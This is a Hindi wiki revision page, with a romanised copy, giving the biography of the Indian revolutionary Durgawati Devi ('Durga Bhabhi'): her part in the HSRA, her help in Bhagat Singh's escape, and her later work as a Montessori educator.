Difference between revisions of "दुर्गा भाभी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 3: Line 3:
 
दुर्गावती देवी (दुर्गा भाभी) का जन्म 7 अक्टूबर सन 1907 को [[इलाहाबाद]], [[उत्तर प्रदेश]] के शहजादपुर नामक [[गाँव]] में पंडित बांके बिहारी के यहाँ हुआ था। उनके पिता इलाहाबाद कलेक्ट्रेट में नाजिर थे और उनके बाबा महेश प्रसाद भट्ट जालौन ज़िले में थानेदार के पद पर तैनात थे। उनके दादा पंडित शिवशंकर शहजादपुर में जमींदार थे, जो बचपन से ही दुर्गा भाभी की सभी बातों को पूर्ण करते थे। दस वर्ष की अल्प आयु में ही दुर्गा भाभी का [[विवाह]] लाहौर के भगवतीचरण बोहरा के साथ हो गया। उनके श्वसुर शिवचरण जी रेलवे में ऊंचे पद पर तैनात थे। [[अंग्रेज़]] सरकार ने उन्हें 'राय साहब' का खिताब दिया था।
 
दुर्गावती देवी (दुर्गा भाभी) का जन्म 7 अक्टूबर सन 1907 को [[इलाहाबाद]], [[उत्तर प्रदेश]] के शहजादपुर नामक [[गाँव]] में पंडित बांके बिहारी के यहाँ हुआ था। उनके पिता इलाहाबाद कलेक्ट्रेट में नाजिर थे और उनके बाबा महेश प्रसाद भट्ट जालौन ज़िले में थानेदार के पद पर तैनात थे। उनके दादा पंडित शिवशंकर शहजादपुर में जमींदार थे, जो बचपन से ही दुर्गा भाभी की सभी बातों को पूर्ण करते थे। दस वर्ष की अल्प आयु में ही दुर्गा भाभी का [[विवाह]] लाहौर के भगवतीचरण बोहरा के साथ हो गया। उनके श्वसुर शिवचरण जी रेलवे में ऊंचे पद पर तैनात थे। [[अंग्रेज़]] सरकार ने उन्हें 'राय साहब' का खिताब दिया था।
  
भगवतीचरण बोहरा राय साहब का पुत्र होने के बावजूद अंग्रेज़ों की दासता से देश को मुक्त कराना चाहते थे। वे क्रांतिकारी संगठन के प्रचार सचिव थे। वर्ष [[1920]] में पिता की मृत्यु के पश्चात भगवतीचरण वोहरा खुलकर क्रांति में आ गए और उनकी पत्‍‌नी दुर्गा भाभी ने भी पूर्ण रूप से सहयोग किया। सन [[1923]] में भगवतीचरण वोहरा ने नेशनल कॉलेज से बी.ए. की परीक्षा उत्तीर्ण की और दुर्गा भाभी ने प्रभाकर की डिग्री हासिल की। दुर्गा भाभी का मायका व ससुराल दोनों पक्ष संपन्न थे। श्वसुर शिवचरण जी ने दुर्गा भाभी को 40 हज़ार व पिता बांके बिहारी ने 5 हज़ार रुपये संकट के दिनों में काम आने के लिए दिए थे, लेकिन इस दंपती ने इन पैसों का उपयोग क्रांतिकारियों के साथ मिलकर देश को आज़ाद कराने में किया। [[मार्च]], [[1926]] में भगवतीचरण वोहरा व [[भगतसिंह]] ने संयुक्त रूप से 'नौजवान भारत सभा' का प्रारूप तैयार किया और रामचंद्र कपूर के साथ मिलकर इसकी स्थापना की। सैकड़ों नौजवानों ने देश को आज़ाद कराने के लिए अपने प्राणों का बलिदान वेदी पर चढ़ाने की शपथ ली। भगतसिंह व भगवतीचरण वोहरा सहित सदस्यों ने अपने [[रक्त]] से प्रतिज्ञा पत्र पर हस्ताक्षर किए। [[28 मई]], [[1930]] को [[रावी नदी]] के तट पर साथियों के साथ बम बनाने के बाद परीक्षण करते समय वोहरा जी शहीद हो गए। उनके शहीद होने के बावजूद दुर्गा भाभी साथी क्रांतिकारियों के साथ सक्रिय रहीं।
+
भगवतीचरण बोहरा राय साहब का पुत्र होने के बावजूद अंग्रेज़ों की दासता से देश को मुक्त कराना चाहते थे। वे क्रांतिकारी संगठन के प्रचार सचिव थे। वर्ष [[1920]] में पिता की मृत्यु के पश्चात भगवतीचरण वोहरा खुलकर क्रांति में आ गए और उनकी पत्‍‌नी दुर्गा भाभी ने भी पूर्ण रूप से सहयोग किया। सन [[1923]] में भगवतीचरण वोहरा ने नेशनल कॉलेज से बी.ए. की परीक्षा उत्तीर्ण की और दुर्गा भाभी ने प्रभाकर की डिग्री हासिल की। दुर्गा भाभी का मायका व ससुराल दोनों पक्ष संपन्न थे। श्वसुर शिवचरण जी ने दुर्गा भाभी को 40 हज़ार व पिता बांके बिहारी ने 5 हज़ार रुपये संकट के दिनों में काम आने के लिए दिए थे, लेकिन इस दंपती ने इन पैसों का उपयोग क्रांतिकारियों के साथ मिलकर देश को आज़ाद कराने में किया। [[मार्च]], [[1926]] में भगवतीचरण वोहरा व [[भगतसिंह]] ने संयुक्त रूप से 'नौजवान भारत सभा' का प्रारूप तैयार किया और रामचंद्र कपूर के साथ मिलकर इसकी स्थापना की। सैकड़ों नौजवानों ने देश को आज़ाद कराने के लिए अपने प्राणों का बलिदान वेदी पर चढ़ाने की शपथ ली। भगतसिंह व भगवतीचरण वोहरा सहित सदस्यों ने अपने [[रक्त]] से प्रतिज्ञा पत्र पर हस्ताक्षर किए।  
  
 +
[[16 नवंबर]], [[1926]] का वह दिन था जब लाहौर में भगतसिंह, भगवतीचरण बोहरा समेत कई क्रांतिकारी इकट्ठे थे। बीच में एक तस्वीर पर माला पड़ी हुई थी। वह तस्वीर थी [[भारत]] की आज़ादी के लिए शहीद हो जाने वाले प्रसिद्ध क्रांतिकारी [[करतार सिंह सराभा]] की। 19 साल की उम्र में [[अमेरिका]] से अपने साथियों सहित भारत आकर सभी सैनिक छावनियों में सैनिक विद्रोह करने की योजना के साथ आए करतार सिंह सराभा को [[1915]] में फांसी पर चढ़ा दिया गया था। उनकी ग्यारहवीं बरसी पर गुरु मानकर करतार की तस्वीर हमेशा अपने साथ रखने वाले भगतसिंह ने एक दमदार भाषण दिया। उसमें भगतसिंह ने चंडी मां की बात करते हुए फिरंगियों को बाहर निकालने का आह्वान किया था। उनके भाषण से एक महिला इतने जोश में आई कि आगे बढ़कर भगतसिंह के माथे पर तिलक लगा दिया। ये थीं दुर्गा भाभी। [[28 मई]], [[1930]] को जब [[रावी नदी]] के तट पर साथियों के साथ बम बनाने के बाद परीक्षण करते समय भगवतीचरण बोहरा शहीद हो गए, तब उनके बाद दुर्गा भाभी साथी क्रांतिकारियों के साथ सक्रिय रहीं।
 +
==क्रांतिकारी गतिविधियाँ==
 +
क्रांतिकारियों के संगठन 'हिंदुस्तान रिपब्लिकन सोशलिस्ट एसोसिएशन' के मास्टर ब्रेन प्रोफ़ेसर भगवतीचरण बोहरा थे। उनको ना सिर्फ बम बनाने में महारथ हासिल थी बल्कि वह अपने संगठन के ब्रेन भी कहे जाते थे। भगतसिंह के संगठन 'नौजवान भारत सभा' का घोषणापत्र भगवतीचरण जी ने ही तैयार किया था। जब चंद्रशेखर आज़ाद की अगुआई में 'हिंदुस्तान सोशलिस्ट रिपब्लिकन एसोसिएशन' के रूप में [[दिल्ली]] के फ़िरोज़शाह कोटला मैदान में फिर से गठन हुआ, तो भगवती को ही उसके प्रचार की जिम्मेदारी दी गई। संगठन के घोषणापत्र को भी भगवती जी ने ही चंद्रशेखर आज़ाद के सहयोग से तैयार किया, जो [[कांग्रेस]] के लाहौर अधिवेशन में जमकर बांटा गया और पढ़ा गया। [[महात्मा गाँधी]] और उनकी अहिंसा की नीतियों में भरोसे के बावजूद तमाम कांग्रेसी नेता इन क्रांतिकारियों को काफ़ी पसंद करते थे।
 +
 +
जब [[आगरा]] से आते वक्त [[लॉर्ड इरविन]] की स्पेशल ट्रेन पर बम फेंका गया तो पूरी योजना भगवतीचरण बोहरा की थी। [[यशपाल]] का बम रखने में अहम रोल था। गुस्से में महात्मा गाँधी ने [[समाचार पत्र]] ‘यंग इंडिया’ के [[2 जनवरी]] के एडीशन में एक आर्टीकल लिखा- ‘कल्ट ऑफ़ बम’, जिसमें गांधी जी ने बम समेत तमाम हिंसावादी तरीकों की आलोचना की। उन्होंने बम जैसे तरीकों से मिली आज़ादी पर सवाल उठाए। ऐसे तरीकों को कायरतापूर्ण बताया। गांधी जी सब के लिए पूज्य थे। उन पर सीधे कोई सवाल नहीं उठाता था, लेकिन भगवतीचरण बोहरा ने तथ्यों के आधार पर पहली बार गांधी जी को जवाब देने की ठान ही ली। [[चंद्रशेखर आज़ाद]] ने भी इस जवाब को तैयार करने में उनकी मदद की। उस लेख का नाम रखा गया- ‘फिलॉसफी ऑफ़ बम’,  जिसमें लिखा था- "There is no crime that Britain has not committed in India. Deliberate misrule has reduced us to paupers, has ‘bled us white’. As a race and a people we stand dishonoured and outraged. Do people still expect us to forget and to forgive? We shall have our revenge – a people’s righteous revenge on the tyrant. Let cowards fall back and cringe for compromise and peace. We ask not for mercy and we give no quarter. Ours is a war to the end – to Victory or Death".
  
 +
दुर्गा भाभी ऐसे माहौल में रह रही थीं तो उनके विचारों में भी क्रांति का प्रभाव आना ही था। वह भी अपने पति भगवतीचरण बोहरा से बम बनाना सीख गईं। संगठन के एक सदस्य विमल प्रसाद जैन ने कुतुब रोड, दिल्ली में हिमालयन टॉयलेट्स नाम से एक फैक्ट्री खोल रखी थी, जो असल में बम बनाने की फैक्ट्री थी, जहां दुर्गा और उनके पति बम बनाने में सहयोग करते थे।
 +
==भगतसिंह की सहायक==
 +
[[19 दिसम्बर]], [[1928]] का दिन था। [[भगतसिंह]] और [[सुखदेव]] सांडर्स को गोली मारने के दो दिन बाद सीधे दुर्गा भाभी के घर पहुंचे। भगतसिंह जिस नए रूप में थे, उसमें दुर्गा उन्हें पहचान नहीं पाईं। भगतसिंह ने अपने बाल कटा लिए थे, हालांकि दुर्गा इस बात से खुश नहीं थीं कि स्कॉट बच गया; क्योंकि इससे पहले हुई एक मीटिंग में दुर्गा भाभी ने खुद स्कॉट को मारने का ऑपरेशन अपने हाथ में लेने की गुजारिश की थी, लेकिन बाकी क्रांतिकारियों ने उन्हें रोक लिया था। [[लाला लाजपत राय]] पर हुए लाठीचार्ज और उसके चलते हुई मौत को लेकर उनके दिल में काफ़ी गुस्सा भरा हुआ था। इधर [[लाहौर]] के चप्पे-चप्पे पर पुलिस तैनात थी। दुर्गा ने उन्हें [[कोलकाता]] निकलने की सलाह दी। उस वक्त कांग्रेस का अधिवेशन कोलकाता में चल रहा था और भगवतीचरण बोहरा भी उसमें भाग लेने गए थे।
 +
 +
तीनों अगले दिन लाहौर रेलवे स्टेशन पहुंचे। सूट-बूट और हैट पहने हुए भगतसिंह, उनके साथ उनका सामान उठाए नौकर के रूप में [[राजगुरु]] और थोड़ा पीछे अपने बच्चे के साथ आतीं दुर्गा देवी। दो फर्स्ट क्लास कम्पार्टमेंट की टिकटें लेकर भगतसिंह और दुर्गा मियां-बीवी की तरह बैठ गए और नौकर वाले कम्पार्टमेंट में राजगुरु बैठ गए। इसी ट्रेन में एक तीसरे डिब्बे में चंद्रशेखर आज़ाद भी थे, जो तीर्थयात्रियों के ग्रुप में शामिल होकर [[रामायण]] की चौपाइयां गाते हुए सफर कर रहे थे। पांच सौ पुलिस वाले ट्रेन और प्लेटफॉर्म पर थे। ऐसे में सभी का बचकर निकलना चमत्कार जैसा था। दुर्गा भाभी की वजह से देश के महान क्रांतिकारियों की जान बच गई थी। ट्रेन सीधे कोलकाता की नहीं ली, क्योंकि सबकी नजर थी। चंद्रशेखर आज़ाद रास्ते में रुक गए। [[कानपुर]] से उन्होंने [[लखनऊ]] के लिए ट्रेन ली। दुर्गा भाभी ने लखनऊ से भगवतीचरण बोहरा को टेलीग्राम भेजा कि वह आ रही हैं, लेने हावड़ा स्टेशन आ जाएं। वहाँ से उन्होंने हावड़ा स्टेशन की ट्रेन ली। सीआईडी हावड़ा स्टेशन पर तैनात थी, लेकिन वह सीधे [[लाहौर]] से आने वाली ट्रेन पर नजर रख रही थी। सब लोग सुरक्षित निकल गए। राजगुरु पहले ही [[बनारस]] के लिए निकल चुके थे।
 +
 +
दुर्गा भाभी यानी दुर्गावती देवी मूल रूप से बंगाली थीं। [[कोलकाता]] में कुछ दिन रहकर वहाँ के कई क्रांतिकारियों से मुलाकात की। वहाँ से वह फिर बच्चे के साथ लाहौर आ गईं, लेकिन इतने बड़े क्रांतिकारियों को इतना बड़ा खतरा मोल लेकर ब्रिटिश पुलिस की नाक के नीचे से निकाल कर ले जाने का जो काम उन्होंने किया था, उसका उन्हें आज़ादी के बाद भी श्रेय नहीं मिला। उसके बाद असेम्बली बम कांड के बाद [[भगतसिंह]] आदि क्रांतिकारी गिरफ्तार हो गए। दुर्गा भाभी ने उन्हें छुड़ाने के लिए वकील को पैसे देने की खातिर अपने सारे गहने बेच दिए। तीन हज़ार रुपए वकील को दिए। फिर [[महात्मा गाँधी]] से भी अपील की कि भगतसिंह और बाकी क्रांतिकारियों के लिए कुछ करें। दुर्गा भाभी की ननद सुशीला देवी भी कम नहीं थीं। उन्होंने अपने [[विवाह]] के लिए रखा दस तोला [[सोना]] भी क्रांतिकारियों के केस लड़ने के लिए उस वक्त बेच दिया था। सुशीला और दुर्गा ने ही असेम्बली बम कांड के लिए जाते भगतसिंह और [[बटुकेश्वर दत्त]] को माथे पर तिलक लगाकर विदा किया था।
 +
==पति की मृत्यु==
 +
इधर 63 दिन की भूख हड़ताल के बाद लाहौर जेल में ही [[जतिन्द्रनाथ दास]] यानी जतिन दा की मौत हो गई तो उनकी लाहौर से लेकर [[कोलकाता]] तक ट्रेन में और कोलकाता में भी अंतिम यात्रा की अगुवाई दुर्गा भाभी ने ही की। इधर उनके पति [[भगवतीचरण बोहरा]] ने [[लॉर्ड इरविन]] की ट्रेन पर बम फेंकने के बाद भगतसिंह, राजगुरु और सुखदेव समेत सभी क्रांतिकारियों को छुड़ाने की योजना बनाई और इसके लिए वह [[रावी नदी]] के तट पर लाहौर में बम का परीक्षण कर रहे थे। [[28 मई]], [[1930]] का दिन था कि अचानक बम फट गया और भगवतीचरण बोहरा की मौत हो गई। दुर्गा भाभी को बड़ा झटका लगा, लेकिन वह जल्द ही उबर गईं और देश की आज़ादी को ही अपने जीवन का आखिरी लक्ष्य मान लिया। तब दुर्गा भाभी ने अंग्रेज़ों को सबक सिखाने के लिए [[पंजाब]] प्रांत के पूर्व गवर्नर लॉर्ड हैली पर हमला करने की योजना बनाई। दुर्गा भाभी ने उस पर [[9 अक्टूबर]], 1930 को बम फेंक भी दिया। हैली और उसके कई सहयोगी घायल हो गए, लेकिन वह घायल होकर भी बच गया। उसके बाद दुर्गा भाभी बचकर निकल गईं, लेकिन जब [[मुंबई]] से पकड़ी गईं तो उन्हें तीन साल के लिए जेल भेज दिया गया। बताया तो ये भी जाता है कि [[चंद्रशेखर आज़ाद]] के पास आखिरी वक्त में जो माउजर था, वह भी दुर्गा भाभी ने ही उनको दिया था।
 +
==मांटेसरी स्कूल की शुरुआत==
 +
एक-एक करके जब सारे क्रांतिकारी इस दुनिया में नहीं रहे तो दुर्गा भाभी के लिए काफ़ी मुश्किल हो गई। बेटा भी बड़ा हो रहा था और पुलिस भी उन्हें बार-बार परेशान कर रही थी। [[लाहौर]] से उन्हें ज़िला बदर कर दिया गया। ऐसे में वह [[1935]] में [[गाज़ियाबाद]] निकल आईं, जहां उन्होंने एक स्कूल में अध्यापिका की नौकरी कर ली। दो साल के लिए [[कांग्रेस]] के साथ भी काम किया, लेकिन फिर छोड़ दिया। फिर उन्होंने [[मद्रास]] जाकर मांटेसरी सिस्टम की ट्रेनिंग ली और फिर [[लखनऊ]] में कैंट रोड पर एक मांटेसरी स्कूल खोला। शुरू में जिसमें सिर्फ पांच बच्चे थे। आज़ादी के बाद उन्होंने सत्ता और नेताओं से काफ़ी दूरी बना ली। [[1956]] में जब [[जवाहरलाल नेहरू]] को उनके बारे में पता चला तो लखनऊ में उनके स्कूल में एक बार मिलने आए। नेहरू जी ने उनकी मदद करने की पेशकश भी की थी। कहा जाता है कि दुर्गा भाभी ने विनम्रता से मना कर दिया था। दुर्गा भाभी को मांटेसरी स्कूलिंग सिस्टम के शुरुआती लोगों में गिना जाता है।
 +
==मृत्यु==
 +
मीडिया और सत्ताधीशों को दुर्गा भाभी की आखिरी खबर [[15 अक्टूबर]], [[1999]] के दिन मिली, जब [[गाज़ियाबाद]] के एक कमरे में उनकी मौत हो गई। तब वह 92 साल की थीं। ये शायद उनके पति के विचारों का ही उन पर प्रभाव था कि पहाड़ जैसी जिंदगी अकेले ही और इतने साहस के साथ गुजार दी और ना जाने कितनों को साहस से जीने की प्रेरणा दी। दुर्गा भाभी ने देश के लिए, उसकी आज़ादी के लिए अपने पति, [[परिवार]], बच्चा और एक खुशहाल जीवन सब कुछ दांव पर लगा दिया, लेकिन आज़ादी के बाद जिस तरह से उन्होंने गुमनामी की चादर ओढ़ी और खुद को बच्चों की एजुकेशन तक सीमित कर लिया, वह वाकई हैरतअंगेज था। शायद ये उनके सपनों का [[भारत]] नहीं था, जैसा उन्होंने कभी कल्पना की थी।
  
  
Line 11: Line 29:
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
*[http://www.mainstree.com/krantikaari_durgabhabhi.html एक सक्रिय क्रांतिकारी दुर्गा भाभी]
 
*[http://www.mainstree.com/krantikaari_durgabhabhi.html एक सक्रिय क्रांतिकारी दुर्गा भाभी]
 +
*[http://www.inkhabar.com/national/32114-durga-bhabhi-saved-life-bhagat-singh-during-freedom-movement बम-पिस्तौल से खेलने वाली दुर्गा भाभी ने बचाई थी भगत सिंह की जान]
 +
*[http://inextlive.jagran.com/durga-bhabhi-67299 दुर्गा भाभी ने देश के लिए दे दी जान]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{स्वतन्त्रता सेनानी}}
 
{{स्वतन्त्रता सेनानी}}
 
[[Category:स्वतन्त्रता सेनानी]][[Category:इतिहास कोश]][[Category:चरित कोश]]
 
[[Category:स्वतन्त्रता सेनानी]][[Category:इतिहास कोश]][[Category:चरित कोश]]
 
__INDEX__
 
__INDEX__

Revision as of 10:33, 1 September 2017

durgavati devi (aangrezi: Durgawati Devi, janm- 7 aktoobar, 1907; mrityu- 15 aktoobar, 1999, gaziyabad) bharat ke svatantrata sangram mean krantikariyoan ki pramukh sahayogi thian. prasiddh kraantikari bhagatasianh ke sath inhian durgavati devi ne 18 disambar, 1928 ko vesh badalakar kalakatta mel se yatra ki thi. chandrashekhar azad ke anurodh par 'di phil aausaphi aauf bam' dastavej taiyar karane vale kraantikari bhagavaticharan bohara ki patni durgavati bohara kraantikariyoan ke bich 'durga bhabhi' ke nam se mashahoor thian. san 1927 mean lala lajapataray ki maut ka badala lene ke liye lahaur mean bulayi gee baithak ki adhyakshata durga bhabhi ne ki thi. tatkalin bambee ke garvanar heli ko marane ki yojana mean telar namak ek aangrez afasar ghayal ho gaya tha, jis par goli durga bhabhi ne hi chalayi thi.

parichay

durgavati devi (durga bhabhi) ka janm 7 aktoobar san 1907 ko ilahabad, uttar pradesh ke shahajadapur namak gaanv mean pandit baanke bihari ke yahaan hua tha. unake pita ilahabad kalektret mean najir the aur unake baba mahesh prasad bhatt jalaun zile mean thanedar ke pad par tainat the. unake dada pandit shivashankar shahajadapur mean jamiandar the, jo bachapan se hi durga bhabhi ki sabhi batoan ko poorn karate the. das varsh ki alp ayu mean hi durga bhabhi ka vivah lahaur ke bhagavaticharan bohara ke sath ho gaya. unake shvasur shivacharan ji relave mean ooanche pad par tainat the. aangrez sarakar ne unhean 'ray sahab' ka khitab diya tha.

bhagavaticharan bohara ray sahab ka putr hone ke bavajood aangrezoan ki dasata se desh ko mukt karana chahate the. ve kraantikari sangathan ke prachar sachiv the. varsh 1920 mean pita ki mrityu ke pashchat bhagavaticharan vohara khulakar kraanti mean a ge aur unaki path‍‌ni durga bhabhi ne bhi poorn roop se sahayog kiya. san 1923 mean bhagavaticharan vohara ne neshanal k aaulej se bi.e. ki pariksha uttirn ki aur durga bhabhi ne prabhakar ki digri hasil ki. durga bhabhi ka mayaka v sasural donoan paksh sanpann the. shvasur shivacharan ji ne durga bhabhi ko 40 hazar v pita baanke bihari ne 5 hazar rupaye sankat ke dinoan mean kam ane ke lie die the, lekin is danpati ne in paisoan ka upayog kraantikariyoan ke sath milakar desh ko azad karane mean kiya. march, 1926 mean bhagavaticharan vohara v bhagatasianh ne sanyukt roop se 'naujavan bharat sabha' ka praroop taiyar kiya aur ramachandr kapoor ke sath milakar isaki sthapana ki. saik doan naujavanoan ne desh ko azad karane ke lie apane pranoan ka balidan vedi par chadhane ki shapath li. bhagatasianh v bhagavaticharan vohara sahit sadasyoan ne apane rakt se pratijna patr par hastakshar kie.

16 navanbar, 1926 ka vah din tha jab lahaur mean bhagatasianh, bhagavaticharan bohara samet kee kraantikari ikatthe the. bich mean ek tasvir par mala p di huee thi. vah tasvir thi bharat ki azadi ke lie shahid ho jane vale prasiddh kraantikari karatar sianh sarabha ki. 19 sal ki umr mean amerika se apane sathiyoan sahit bharat akar sabhi sainik chhavaniyoan mean sainik vidroh karane ki yojana ke sath ae karatar sianh sarabha ko 1915 mean phaansi par chadha diya gaya tha. unaki gyarahavian barasi par guru manakar karatar ki tasvir hamesha apane sath rakhane vale bhagatasianh ne ek damadar bhashan diya. usamean bhagatasianh ne chandi maan ki bat karate hue phirangiyoan ko bahar nikalane ka ahvan kiya tha. unake bhashan se ek mahila itane josh mean aee ki age badhakar bhagatasianh ke mathe par tilak laga diya. ye thian durga bhabhi. 28 mee, 1930 ko jab ravi nadi ke tat par sathiyoan ke sath bam banane ke bad parikshan karate samay bhagavaticharan bohara shahid ho ge, tab unake bad durga bhabhi sathi kraantikariyoan ke sath sakriy rahian.

kraantikari gatividhiyaan

kraantikariyoan ke sangathan 'hiandustan ripablikan soshalist esosieshan' ke mastar bren profesar bhagavaticharan bohara the. unako na sirph bam banane mean maharath hasil thi balki vah apane sangathan ke bren bhi kahe jate the. bhagatasianh ke sangathan 'naujavan bharat sabha' ka ghoshanapatr bhagavaticharan ji ne hi taiyar kiya tha. jab chandrashekhar azad ki aguaee mean 'hiandustan soshalist ripablikan esosieshan' ke roop mean dilli ke firozashah kotala maidan mean phir se gathan hua, to bhagavati ko hi usake prachar ki jimmedari di gee. sangathan ke ghoshanapatr ko bhi bhagavati ji ne hi chandrashekhar azad ke sahayog se taiyar kiya, jo kaangres ke lahaur adhiveshan mean jamakar baanta gaya aur padha gaya. mahatma gaandhi aur unaki ahiansa ki nitiyoan mean bharose ke bavajood tamam kaangresi neta in kraantikariyoan ko kafi pasand karate the.

jab agara se ate vakt l aaurd iravin ki speshal tren par bam pheanka gaya to poori yojana bhagavaticharan bohara ki thi. yashapal ka bam rakhane mean aham rol tha. gusse mean mahatma gaandhi ne samachar patr ‘yang iandiya’ ke 2 janavari ke edishan mean ek artikal likha- ‘kalt aauf bam’, jisamean gaandhi ji ne bam samet tamam hiansavadi tarikoan ki alochana ki. unhoanne bam jaise tarikoan se mili azadi par saval uthae. aise tarikoan ko kayaratapoorn bataya. gaandhi ji sab ke lie poojy the. un par sidhe koee saval nahian uthata tha, lekin bhagavaticharan bohara ne tathyoan ke adhar par pahali bar gaandhi ji ko javab dene ki than hi li. chandrashekhar azad ne bhi is javab ko taiyar karane mean unaki madad ki. us lekh ka nam rakha gaya- ‘phil aausaphi aauf bam’, jisamean likha tha- "There is no crime that Britain has not committed in India. Deliberate misrule has reduced us to paupers, has ‘bled us white’. As a race and a people we stand dishonoured and outraged. Do people still expect us to forget and to forgive? We shall have our revenge – a people’s righteous revenge on the tyrant. Let cowards fall back and cringe for compromise and peace. We ask not for mercy and we give no quarter. Ours is a war to the end – to Victory or Death".

durga bhabhi aise mahaul mean rah rahi thian to unake vicharoan mean bhi kraanti ka prabhav ana hi tha. vah bhi apane pati bhagavaticharan bohara se bam banana sikh geean. sangathan ke ek sadasy vimal prasad jain ne kutub rod, dilli mean himalayan t aauyalets nam se ek phaiktri khol rakhi thi, jo asal mean bam banane ki phaiktri thi, jahaan durga aur unake pati bam banane mean sahayog karate the.

bhagatasianh ki sahayak

19 disambar, 1928 ka din tha. bhagatasianh aur sukhadev saandars ko goli marane ke do din bad sidhe durga bhabhi ke ghar pahuanche. bhagatasianh jis ne roop mean the, usamean durga unhean pahachan nahian paeean. bhagatasianh ne apane bal kata lie the, halaanki durga is bat se khush nahian thian ki sk aaut bach gaya; kyoanki isase pahale huee ek mitiang mean durga bhabhi ne khud sk aaut ko marane ka aaupareshan apane hath mean lene ki gujarish ki thi, lekin baki kraantikariyoan ne unhean rok liya tha. lala lajapat ray par hue lathicharj aur usake chalate huee maut ko lekar unake dil mean kafi gussa bhara hua tha. idhar lahaur ke chappe-chappe par pulis tainat thi. durga ne unhean kolakata nikalane ki salah di. us vakt kaangres ka adhiveshan kolakata mean chal raha tha aur bhagavaticharan bohara bhi usamean bhag lene ge the.

tinoan agale din lahaur relave steshan pahuanche. soot-boot aur hait pahane hue bhagatasianh, unake sath unaka saman uthae naukar ke roop mean rajaguru aur tho da pichhe apane bachche ke sath atian durga devi. do pharst klas kampartameant ki tikatean lekar bhagatasianh aur durga miyaan-bivi ki tarah baith ge aur naukar vale kampartameant mean rajaguru baith ge. isi tren mean ek tisare dibbe mean chandrashekhar azad bhi the, jo tirthayatriyoan ke grup mean shamil hokar ramayan ki chaupaiyaan gate hue saphar kar rahe the. paanch sau pulis vale tren aur pletaph aaurm par the. aise mean sabhi ka bachakar nikalana chamatkar jaisa tha. durga bhabhi ki vajah se desh ke mahan kraantikariyoan ki jan bach gee thi. tren sidhe kolakata ki nahian li, kyoanki sabaki najar thi. chandrashekhar azad raste mean ruk ge. kanapur se unhoanne lakhanoo ke lie tren li. durga bhabhi ne lakhanoo se bhagavaticharan bohara ko teligram bheja ki vah a rahi haian, lene hav da steshan a jaean. vahaan se unhoanne hav da steshan ki tren li. siaeedi hav da steshan par tainat thi, lekin vah sidhe lahaur se ane vali tren par najar rakh rahi thi. sab log surakshit nikal ge. rajaguru pahale hi banaras ke lie nikal chuke the.

durga bhabhi yani durgavati devi mool roop se bangali thian. kolakata mean kuchh din rahakar vahaan ke kee kraantikariyoan se mulakat ki. vahaan se vah phir bachche ke sath lahaur a geean, lekin itane b de kraantikariyoan ko itana b da khatara mol lekar british pulis ki nak ke niche se nikal kar le jane ka jo kam unhoanne kiya tha, usaka unhean azadi ke bad bhi shrey nahian mila. usake bad asembali bam kaand ke bad bhagatasianh adi kraantikari giraphtar ho ge. durga bhabhi ne unhean chhu dane ke lie vakil ko paise dene ki khatir apane sare gahane bech die. tin hazar rupe vakil ko die. phir mahatma gaandhi se bhi apil ki ki bhagatasianh aur baki kraantikariyoan ke lie kuchh karean. durga bhabhi ki nanad sushila devi bhi kam nahian thian. unhoanne apane vivah ke lie rakha das tola sona bhi kraantikariyoan ke kes l dane ke lie us vakt bech diya tha. sushila aur durga ne hi asembali bam kaand ke lie jate bhagatasianh aur batukeshvar datt ko mathe par tilak lagakar vida kiya tha.

pati ki mrityu

idhar 63 din ki bhookh h datal ke bad lahaur jel mean hi jatindranath das yani jatin da ki maut ho gee to unaki lahaur se lekar kolakata tak tren mean aur kolakata mean bhi aantim yatra ki aguvaee durga bhabhi ne hi ki. idhar unake pati bhagavaticharan bohara ne l aaurd iravin ki tren par bam pheankane ke bad bhagatasianh, rajaguru aur sukhadev samet sabhi kraantikariyoan ko chhu dane ki yojana banaee aur isake lie vah ravi nadi ke tat par lahaur mean bam ka parikshan kar rahe the. 28 mee, 1930 ka din tha ki achanak bam phat gaya aur bhagavaticharan bohara ki maut ho gee. durga bhabhi ko b da jhataka laga, lekin vah jald hi ubar geean aur desh ki azadi ko hi apane jivan ka akhiri lakshy man liya. tab durga bhabhi ne aangrezoan ko sabak sikhane ke lie panjab praant ke poorv gavarnar l aaurd haili par hamala karane ki yojana banaee. durga bhabhi ne us par 9 aktoobar, 1930 ko bam pheank bhi diya. haili aur usake kee sahayogi ghayal ho ge, lekin vah ghayal hokar bhi bach gaya. usake bad durga bhabhi bachakar nikal geean, lekin jab muanbee se pak di geean to unhean tin sal ke lie jel bhej diya gaya. bataya to ye bhi jata hai ki chandrashekhar azad ke pas akhiri vakt mean jo maujar tha, vah bhi durga bhabhi ne hi unako diya tha.

maantesari skool ki shuruat

ek-ek karake jab sare kraantikari is duniya mean nahian rahe to durga bhabhi ke lie kafi mushkil ho gee. beta bhi b da ho raha tha aur pulis bhi unhean bar-bar pareshan kar rahi thi. lahaur se unhean zila badar kar diya gaya. aise mean vah 1935 mean gaziyabad nikal aeean, jahaan unhoanne ek skool mean adhyapika ki naukari kar li. do sal ke lie kaangres ke sath bhi kam kiya, lekin phir chho d diya. phir unhoanne madras jakar maantesari sistam ki treniang li aur phir lakhanoo mean kaiant rod par ek maantesari skool khola. shuroo mean jisamean sirph paanch bachche the. azadi ke bad unhoanne satta aur netaoan se kafi doori bana li. 1956 mean jab javaharalal neharoo ko unake bare mean pata chala to lakhanoo mean unake skool mean ek bar milane ae. neharoo ji ne unaki madad karane ki peshakash bhi ki thi. kaha jata hai ki durga bhabhi ne vinamrata se mana kar diya tha. durga bhabhi ko maantesari skooliang sistam ke shuruati logoan mean gina jata hai.

mrityu

midiya aur sattadhishoan ko durga bhabhi ki akhiri khabar 15 aktoobar, 1999 ke din mili, jab gaziyabad ke ek kamare mean unaki maut ho gee. tab vah 92 sal ki thian. ye shayad unake pati ke vicharoan ka hi un par prabhav tha ki paha d jaisi jiandagi akele hi aur itane sahas ke sath gujar di aur na jane kitanoan ko sahas se jine ki prerana di. durga bhabhi ne desh ke lie, usaki azadi ke lie apane pati, parivar, bachcha aur ek khushahal jivan sab kuchh daanv par laga diya, lekin azadi ke bad jis tarah se unhoanne gumanami ki chadar odhi aur khud ko bachchoan ki ejukeshan tak simit kar liya, vah vakee hairataangej tha. shayad ye unake sapanoan ka bharat nahian tha, jaisa unhoanne kabhi kalpana ki thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

